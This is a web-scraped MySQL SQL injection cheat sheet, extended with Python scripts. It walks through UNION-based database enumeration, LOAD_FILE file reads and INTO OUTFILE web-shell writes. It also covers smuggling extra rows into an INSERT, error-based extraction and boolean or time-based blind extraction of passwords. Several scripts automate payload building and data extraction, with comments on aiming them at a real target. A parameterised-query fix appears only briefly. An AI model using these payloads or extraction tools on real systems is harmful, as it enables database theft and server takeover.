MySQL Injection summary

Source: Internet
Author: User
Tags: benchmark, mysql, injection

SELECT first_name, last_name FROM users WHERE user_id = '$id'

1. With id=1' or 1=1-- (note the trailing space) the query returns every row: the payload closes the quoted string, 1=1 is always true, and everything after -- is a comment, so the application's own closing quote is swallowed. In MySQL -- starts a comment only when it is followed by a space or control character.

Other comment sequences: # (to end of line) and /* ... */ (an unterminated /* comments out the rest of the statement).
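The following Python script is an added example, not code from the original page. It runs the query above once built by string interpolation (exactly as '$id' is spliced in the PHP original) and once with a bound parameter, feeding both the 1' or 1=1-- payload. An in-memory SQLite database stands in for MySQL, which is sound here because the syntax involved (quoted literals and -- comments) behaves the same; the users table and its three rows are constructed for the example.

```python
import sqlite3

# Constructed sample data standing in for the page's `users` table.
SAMPLE_USERS = [
    (1, "admin", "admin"),
    (2, "gordon", "brown"),
    (3, "pablo", "picasso"),
]

# The payload from the text. MySQL needs the space after "--"; SQLite accepts it too.
PAYLOAD = "1' or 1=1-- "


def connect():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (user_id INTEGER, first_name TEXT, last_name TEXT)")
    con.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    return con


def lookup_vulnerable(con, user_id):
    # The page's query built the way "... = '$id'" is in PHP: the input becomes SQL text,
    # so the statement actually executed is
    #   SELECT first_name, last_name FROM users WHERE user_id = '1' or 1=1-- '
    sql = f"SELECT first_name, last_name FROM users WHERE user_id = '{user_id}'"
    return con.execute(sql).fetchall()


def lookup_safe(con, user_id):
    # Same query with a bound parameter: the driver passes the value separately from
    # the statement text, so quotes and comment markers in it are data, never syntax.
    sql = "SELECT first_name, last_name FROM users WHERE user_id = ?"
    return con.execute(sql, (user_id,)).fetchall()


def demo():
    con = connect()
    return {
        "vulnerable": lookup_vulnerable(con, PAYLOAD),  # every row comes back
        "safe": lookup_safe(con, PAYLOAD),              # [] : no user_id equals the payload text
        "normal": lookup_safe(con, 2),                  # [("gordon", "brown")]
    }


if __name__ == "__main__":
    for name, rows in demo().items():
        print(f"{name:10s} -> {rows}")
```

The parameterised form is the fix for every technique on this page: the UNION, error-based and blind payloads below all rely on the input being concatenated into the statement text.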

Directory:

0x00 MySQL General injection (SELECT)

0x01 MySQL General injection (INSERT, UPDATE)

0x02 MySQL Error injection

0x03 MySQL Boolean-based blind injection

0x04 MySQL Time-based blind injection

0x05 MySQL Other injection tips

0x06 MySQL Database version features

Body:

0x00 MySQL General injection (SELECT)

1. Comment characters

#
/* ... */
-- (must be followed by a space)

2. Bypassing space filtering

Use /**/, parentheses around expressions, or + (a URL-encoded space) instead of a literal space. MySQL also treats the following URL-encoded characters as whitespace:

%0c = form feed, new page
%09 = horizontal tab
%0d = carriage return
%0a = line feed, new line

3. Returning several values through one column

CONCAT()
GROUP_CONCAT()
CONCAT_WS()

4. Useful functions and variables

SYSTEM_USER() synonym for USER()
USER() user name and host the client connected with
CURRENT_USER() the account the server actually authenticated (may differ from USER())
SESSION_USER() synonym for USER()
DATABASE() current database name
VERSION() MySQL server version
LOAD_FILE() reads a local file from the server (requires the FILE privilege)
@@datadir data directory path
@@basedir MySQL installation path
@@version_compile_os operating system the server was built for (e.g. Win32, Win64, Linux)

The kind of over-privileged account these functions reveal is created by a GRANT such as the following (the IDENTIFIED BY clause of GRANT was removed in MySQL 8.0):

GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY '123456' WITH GRANT OPTION;

5. Typical UNION-based injection statements

Find the number of columns (increase n until the query errors):

ORDER BY n/*

Show basic server information (CHAR(32,58,32) is " : " and 0x7c is "|", used as separators):

and 1=2 UNION SELECT 1,2,3,CONCAT_WS(CHAR(32,58,32),0x7c,USER(),DATABASE(),VERSION()),5,6,7/*

List databases:

and 1=2 UNION SELECT 1,schema_name,3,4 FROM information_schema.schemata LIMIT 1,1/*

and 1=2 UNION SELECT 1,GROUP_CONCAT(schema_name),3,4 FROM information_schema.schemata/*

List table names (the database name is given as a hex literal, 0x..., so no quotes are needed):

and 1=2 UNION SELECT 1,2,3,4,table_name,5 FROM information_schema.tables WHERE table_schema=<database name as hex> LIMIT 1,1/*

and 1=2 UNION SELECT 1,2,3,4,GROUP_CONCAT(table_name),5 FROM information_schema.tables WHERE table_schema=<database name as hex>/*

List columns:

and 1=2 UNION SELECT 1,2,3,4,column_name,5,6,7 FROM information_schema.columns WHERE table_name=<table name as hex> AND table_schema=<database name as hex> LIMIT 1,1/*

and 1=2 UNION SELECT 1,2,3,4,GROUP_CONCAT(column_name),5,6,7 FROM information_schema.columns WHERE table_name=<table name as hex> AND table_schema=<database name as hex>/*

Read the data:

and 1=2 UNION SELECT 1,2,3,<column 1>,5,<column 2>,7,8 FROM <database>.<table>/*

Check whether mysql.user is readable (normally only privileged accounts can read it) and whether FILE privileges exist:

and (SELECT COUNT(*) FROM mysql.user)>0/*

and (SELECT COUNT(File_priv) FROM mysql.user)>0/*

COUNT(File_priv) only counts non-NULL values, so a true result proves that mysql.user is readable, not that you hold the FILE privilege; check that the File_priv column is 'Y' for your account. The secure_file_priv variable (often set to a single directory on MySQL 5.7 and later, and disabling file access entirely when NULL) further restricts where LOAD_FILE() may read and INTO OUTFILE may write.

6. Reading and writing files from MySQL

Requirements:

Read: the FILE privilege.

Write: the FILE privilege plus 1. an absolute path into a directory the MySQL server process can write to, 2. a usable UNION (the file content has to come out of a SELECT), 3. single quotes must survive filtering, because INTO OUTFILE accepts only a quoted string literal as the file name (hex or CHAR() encoding does not work there).

-------------------------Read----------------------

MySQL 3.x read method

CREATE TABLE a (cmd TEXT);

LOAD DATA INFILE 'c:\\xxx\\xxx\\xxx.txt' INTO TABLE a;

SELECT * FROM a;

MySQL 4.x read method

In addition to the method above, LOAD_FILE() is available:

CREATE TABLE a (cmd TEXT);

INSERT INTO a (cmd) VALUES (LOAD_FILE('c:\\ddd\\ddd\\ddd.txt'));

SELECT * FROM a;

MySQL 5.x read method

Both methods above work.

Tips for reading files: the path can be passed without quotes, either as CHAR() with decimal byte values or as a hex literal. Both forms below encode c:\boot.ini (inside a single-quoted string the backslash would have to be doubled, as in the LOAD DATA example; in CHAR() and hex form it is a plain byte):

LOAD_FILE(CHAR(99,58,92,98,111,111,116,46,105,110,105))

LOAD_FILE(0x633a5c626f6f742e696e69)

------------Write--------------------------

Writing files with INTO OUTFILE (the file name must be a quoted literal; on Windows double the backslashes or use forward slashes, because a single backslash is an escape character inside a MySQL string):

UNION SELECT 1,2,3,CHAR(<web shell bytes as decimal, or a 0x hex literal>),5,6,7,8,9,10,7 INTO OUTFILE 'd:\\web\\90team.php'/*

UNION SELECT 1,2,3,LOAD_FILE('d:\\web\\logo123.jpg'),5,6,7,8,9,10,7 INTO OUTFILE 'd:\\web\\90team.php'/*

The second form copies a web shell that was previously uploaded disguised as an image (logo123.jpg) to a path under the web root where the server will execute it.
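The hex and CHAR() encodings used in points 5 and 6 above are easy to get wrong by hand, so here is an added Python helper (not part of the original page) that produces both encodings, decodes a hex literal back, and assembles the information_schema enumeration, LOAD_FILE and INTO OUTFILE payloads in the page's own form. The column count and the position of the column the page echoes are assumptions the caller supplies; the database name "testdb" and the file paths in the usage call are constructed examples.

```python
def hex_literal(value) -> str:
    """Encode text or bytes as a MySQL hex literal (0x...). Usable wherever a string
    is expected, except as the INTO OUTFILE file name."""
    data = value.encode("utf-8") if isinstance(value, str) else bytes(value)
    return "0x" + data.hex()


def char_call(value) -> str:
    """Encode text or bytes as CHAR(n,n,...): the decimal variant of the same trick."""
    data = value.encode("utf-8") if isinstance(value, str) else bytes(value)
    return "CHAR(" + ",".join(str(b) for b in data) + ")"


def decode_hex_literal(literal: str) -> str:
    """Reverse of hex_literal(), e.g. to read a payload found in a log."""
    if not literal.lower().startswith("0x"):
        raise ValueError("not a hex literal")
    return bytes.fromhex(literal[2:]).decode("utf-8")


def columns(n_cols: int, position: int, expr: str) -> str:
    """UNION column list: placeholders 1..n_cols with `expr` in the (1-based)
    column that the application actually displays."""
    if not 1 <= position <= n_cols:
        raise ValueError("position outside column count")
    return ",".join(expr if i == position else str(i) for i in range(1, n_cols + 1))


def list_databases(n_cols: int, position: int, comment: str = "/*") -> str:
    expr = "GROUP_CONCAT(schema_name)"
    return f"and 1=2 UNION SELECT {columns(n_cols, position, expr)} FROM information_schema.schemata{comment}"


def list_tables(db: str, n_cols: int, position: int, comment: str = "/*") -> str:
    expr = "GROUP_CONCAT(table_name)"
    return (f"and 1=2 UNION SELECT {columns(n_cols, position, expr)} "
            f"FROM information_schema.tables WHERE table_schema={hex_literal(db)}{comment}")


def list_columns(db: str, table: str, n_cols: int, position: int, comment: str = "/*") -> str:
    expr = "GROUP_CONCAT(column_name)"
    return (f"and 1=2 UNION SELECT {columns(n_cols, position, expr)} "
            f"FROM information_schema.columns WHERE table_name={hex_literal(table)} "
            f"AND table_schema={hex_literal(db)}{comment}")


def read_file(path: str, n_cols: int, position: int, comment: str = "/*") -> str:
    """LOAD_FILE() with a hex-encoded path: no quotes needed (FILE privilege required)."""
    expr = f"LOAD_FILE({hex_literal(path)})"
    return f"and 1=2 UNION SELECT {columns(n_cols, position, expr)}{comment}"


def write_file(content: bytes, path: str, n_cols: int, position: int, comment: str = "/*") -> str:
    """INTO OUTFILE: the content may be CHAR()-encoded, but the file name must be a
    quoted literal, so backslashes and quotes in it are escaped for a MySQL string."""
    quoted = path.replace("\\", "\\\\").replace("'", "\\'")
    return f"UNION SELECT {columns(n_cols, position, char_call(content))} INTO OUTFILE '{quoted}'{comment}"


if __name__ == "__main__":
    # Constructed usage: a 6-column query whose 5th column is displayed.
    print(list_databases(6, 5))
    print(list_tables("testdb", 6, 5))
    print(list_columns("testdb", "users", 6, 5))
    print(read_file("c:\\boot.ini", 6, 5))
    print(write_file(b"<?php echo 1; ?>", "d:\\web\\x.php", 6, 5))
    print(decode_hex_literal("0x633a5c626f6f742e696e69"))
```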

0x01 MySQL General injection (INSERT, UPDATE)

PHP's mysql_query() sends a single statement, so stacked queries are not possible through it; mysqli_multi_query() (and PDO with emulated prepared statements) do allow several statements in one call.

INSERT injection is mostly exploited with error-based techniques (see 0x02)!

1. If you can inject into an INSERT directly, add a row of your own, for example an administrator account: close the current row, start a second one, and let the comment swallow the rest of the original statement:

INSERT INTO user (username,password) VALUES ('xxxx','xxxx'),('dddd','dddd')/*');

2. If you can insert data that is later displayed on a web page, combine the injection with XSS and CSRF to steal cookies or get a shell.

UPDATE injection works the same way.
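The row-smuggling INSERT in point 1 above, as an added example (not from the original page): a registration handler that builds its INSERT by string formatting versus one that binds parameters, both given the same attacker-controlled username. SQLite stands in for MySQL; both accept multi-row VALUES lists and treat an unterminated /* as a comment running to the end of the statement. The user table and the password value are constructed for the example.

```python
import sqlite3

# Attacker-controlled username from the text: it closes the current row, appends a
# second row, and comments out whatever the application adds afterwards.
PAYLOAD_USERNAME = "xxxx','xxxx'),('dddd','dddd')/*"


def connect():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE user (username TEXT, password TEXT)")
    return con


def register_vulnerable(con, username, password):
    # String-built INSERT. With the payload the statement actually executed is
    #   INSERT INTO user (username,password) VALUES ('xxxx','xxxx'),('dddd','dddd')/*','<password>')
    # so two rows are written and the real password is never used.
    sql = f"INSERT INTO user (username,password) VALUES ('{username}','{password}')"
    con.execute(sql)
    con.commit()


def register_safe(con, username, password):
    # Bound parameters: the whole payload is stored verbatim as one username.
    con.execute("INSERT INTO user (username,password) VALUES (?,?)", (username, password))
    con.commit()


def accounts(con):
    return con.execute("SELECT username, password FROM user ORDER BY username").fetchall()


def demo():
    vuln, safe = connect(), connect()
    register_vulnerable(vuln, PAYLOAD_USERNAME, "secret")
    register_safe(safe, PAYLOAD_USERNAME, "secret")
    return {"vulnerable": accounts(vuln), "safe": accounts(safe)}


if __name__ == "__main__":
    for name, rows in demo().items():
        print(f"{name:10s} -> {rows}")
```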

0x02 MySQL Error injection

1. Duplicate-entry error. FLOOR(RAND(0)*2) produces a repeating 0/1 sequence that is evaluated more than once per row, so the GROUP BY key built from it collides in the temporary table and MySQL reports the key, including the value concatenated into it, in the error message:

and (SELECT 1 FROM (SELECT COUNT(*),CONCAT((SELECT (statement)),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) and 1=1

(statement) is any query returning a single value, for example: SELECT DISTINCT CONCAT(0x7e,0x27,schema_name,0x27,0x7e) FROM information_schema.schemata LIMIT 0,1

2. NAME_CONST: two columns with the same NAME_CONST() name raise a duplicate column name error that carries the name. NAME_CONST() accepts only constant arguments, so (statement) must be something like VERSION() or @@datadir (+ stands for a URL-encoded space):

and+1=(select+*+from+(select+name_const((statement),1),name_const((statement),1))a)--

3. The same duplicate-entry trick inside an UPDATE. SUBSTRING(...,1,62) keeps the key short enough that the value is not cut off in the error message (the digit from FLOOR(RAND(0)*2) takes one more character):

UPDATE web_ids SET host='www.0x50sec.org' WHERE id=1 AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT(FLOOR(RAND(0)*2),(SUBSTRING((SELECT (statement)),1,62)))a FROM information_schema.tables GROUP BY a)b);

4. And inside an INSERT:

INSERT INTO web_ids (host) VALUES ((SELECT (1) FROM mysql.user WHERE 1=1 AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT(FLOOR(RAND(0)*2),(SUBSTRING((SELECT (statement)),1,62)))a FROM information_schema.tables GROUP BY a)b)));
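An added Python example (not from the original page) that turns point 1 and the 62-character window of points 3 and 4 into a complete extraction loop: it builds the duplicate-entry payload for successive SUBSTRING windows, parses the leaked value out of the "Duplicate entry" message, and reassembles it. A constructed stand-in for the vulnerable application answers the payloads; its secret string and the error text format it returns are constructed for the example, and the inner SELECT passed in is only carried along as text.

```python
import re

# The page's 62-character window: with the 0/1 digit appended, the GROUP BY key stays
# within the value length that MySQL 5.0/5.1 print in a "Duplicate entry" message.
CHUNK = 62


def error_payload(inner_select: str, offset: int, chunk: int = CHUNK) -> str:
    """Duplicate-entry payload in the page's form 1, leaking `chunk` characters of the
    inner query's result starting at `offset` (1-based, as in SUBSTRING)."""
    piece = f"SUBSTRING(({inner_select}),{offset},{chunk})"
    return (f"and (SELECT 1 FROM (SELECT COUNT(*),CONCAT({piece},FLOOR(RAND(0)*2))x "
            f"FROM information_schema.tables GROUP BY x)a)")


# "Duplicate entry '<data><0|1>' for key ...": strip the trailing digit to recover <data>.
_DUPLICATE = re.compile(r"Duplicate entry '(.*)[01]' for key")


def parse_duplicate(error_text: str):
    """Return the leaked data from a MySQL duplicate-entry error, or None if absent."""
    m = _DUPLICATE.search(error_text)
    return m.group(1) if m else None


def extract_all(inner_select: str, send, chunk: int = CHUNK) -> str:
    """Recover the whole value by sliding the SUBSTRING window. `send(payload)` returns
    the error text the application echoed back ('' when it raised none)."""
    result, offset = "", 1
    while True:
        piece = parse_duplicate(send(error_payload(inner_select, offset, chunk)))
        if not piece:              # None: nothing leaked; '': window is past the end
            return result
        result += piece
        if len(piece) < chunk:     # a short window was the last one
            return result
        offset += chunk


# --- constructed stand-in for a vulnerable application backed by MySQL 5.x ---

# Constructed secret, formatted like USER() plus a mysql_native_password hash plus a
# variable; it is longer than one 62-character window on purpose.
_SECRET = "root@localhost:*81F5E21E35407D884A6CD4A731AEBFB6AF209E1B:secure_file_priv=NULL"
_WINDOW = re.compile(r"SUBSTRING\(\(.*\),(\d+),(\d+)\)")


def fake_app(payload: str) -> str:
    """Evaluates only the SUBSTRING window and answers the way mysql_error() would."""
    m = _WINDOW.search(payload)
    if not m:
        return ""
    offset, length = int(m.group(1)), int(m.group(2))
    piece = _SECRET[offset - 1:offset - 1 + length]
    return f"Duplicate entry '{piece}1' for key 'group_key'"


if __name__ == "__main__":
    print(extract_all("SELECT CONCAT_WS(0x3a,USER(),@@secure_file_priv)", fake_app))
```

Against a real target, `send` would submit the payload in the injectable parameter and return the database error text from the response; everything else stays the same.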

0x03 MySQL Boolean-based blind injection

Using ASCII():

and ASCII(SUBSTRING((SELECT password FROM users WHERE id=1),1,1))=49

Using regular expressions:

and 1=(SELECT 1 FROM information_schema.tables WHERE table_schema="blind_sqli" AND table_name REGEXP '^[a-n]' LIMIT 0,1)

0x04 MySQL Time-based blind injection

1170 UNION SELECT IF(SUBSTRING(current,1,1)=CHAR(<code>),BENCHMARK(5000000,ENCODE('MSG','by 5 seconds')),NULL) FROM (SELECT DATABASE() AS current) AS tbl

UNION SELECT IF(SUBSTRING(password,1,1)='a',BENCHMARK(100000,SHA1(1)),0) User,password FROM mysql.user WHERE User='root'

BENCHMARK() burns CPU, so the delay it causes depends on the server's speed and load; from MySQL 5.0.12 SLEEP(seconds) gives a predictable delay instead (ENCODE() itself was removed in MySQL 8.0).
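The two blind sections above test one character against one value per request. The added Python example below (not from the original page) replaces the equality test with a ">" comparison and binary-searches each character's code, so a character costs about seven requests instead of up to 127, and shows that the same search works whether the answer is read from the page content (0x03) or from the response time (0x04). The vulnerable page is simulated: its secret, the "First name:" marker it prints, the SLEEP-based timing and the 4-second threshold are all constructed for the example.

```python
import re


def bool_payload(query: str, pos: int, code: int) -> str:
    """Boolean probe in the page's ASCII(SUBSTRING(...)) form: true when the pos-th
    character of the query's result has a code greater than `code`."""
    return f"1' and ASCII(SUBSTRING(({query}),{pos},1))>{code}-- "


def time_payload(query: str, pos: int, code: int, seconds: int = 5) -> str:
    # SLEEP() exists from MySQL 5.0.12; the page's BENCHMARK() variant works the same way.
    return f"1' and IF(ASCII(SUBSTRING(({query}),{pos},1))>{code},SLEEP({seconds}),0)-- "


def extract_string(greater_than, max_len: int = 256) -> str:
    """`greater_than(pos, code)` answers a probe. Binary-search each character's code
    in 0..127 and stop at 0, which is what ASCII() returns past the end of the value."""
    out = ""
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            if greater_than(pos, mid):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:
            break
        out += chr(lo)
    return out


# --- constructed stand-in for the vulnerable page ---

_SECRET = "5f4dcc3b5aa765d61d8327deb882cf99"   # constructed: MD5 of "password"
_PROBE = re.compile(r"SUBSTRING\(\(.*\),(\d+),1\)\)>(\d+)")


def fake_page(payload: str):
    """Returns (body, seconds taken): the two signals an attacker can observe."""
    m = _PROBE.search(payload)
    pos, code = int(m.group(1)), int(m.group(2))
    ch = _SECRET[pos - 1:pos]
    truth = (ord(ch) if ch else 0) > code
    if "SLEEP(" in payload:
        return "", (5.0 if truth else 0.05)
    return ("First name: admin" if truth else ""), 0.05


def boolean_oracle(query: str):
    # Truth is read from the content: the row only appears when the condition holds.
    return lambda pos, code: "First name" in fake_page(bool_payload(query, pos, code))[0]


def time_oracle(query: str, threshold: float = 4.0):
    # Truth is read from the delay; the threshold must sit well above normal latency.
    return lambda pos, code: fake_page(time_payload(query, pos, code))[1] >= threshold


if __name__ == "__main__":
    q = "SELECT password FROM users WHERE id=1"
    print(extract_string(boolean_oracle(q)))
    print(extract_string(time_oracle(q)))
```

For a real target, fake_page is replaced by a function that sends the payload in the injectable parameter and returns the response body and elapsed time; a time-based oracle should repeat a probe whose timing is close to the threshold, since network jitter produces false answers.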

0x05 MySQL Other injection tips

To be updated as new tricks are encountered.

0x06 MySQL Database version features

1. information_schema exists from MySQL 5.0 onwards (the enumeration queries in 0x00 depend on it).

2. From MySQL 5.1, a UDF shared library must be placed in the plugin directory (@@plugin_dir, typically <basedir>\lib\plugin\) before CREATE FUNCTION ... SONAME can load it.

3. From MySQL 5.x, system can be used to execute commands (this is the \! command of the mysql command-line client, and it runs on the client machine, not inside the server).
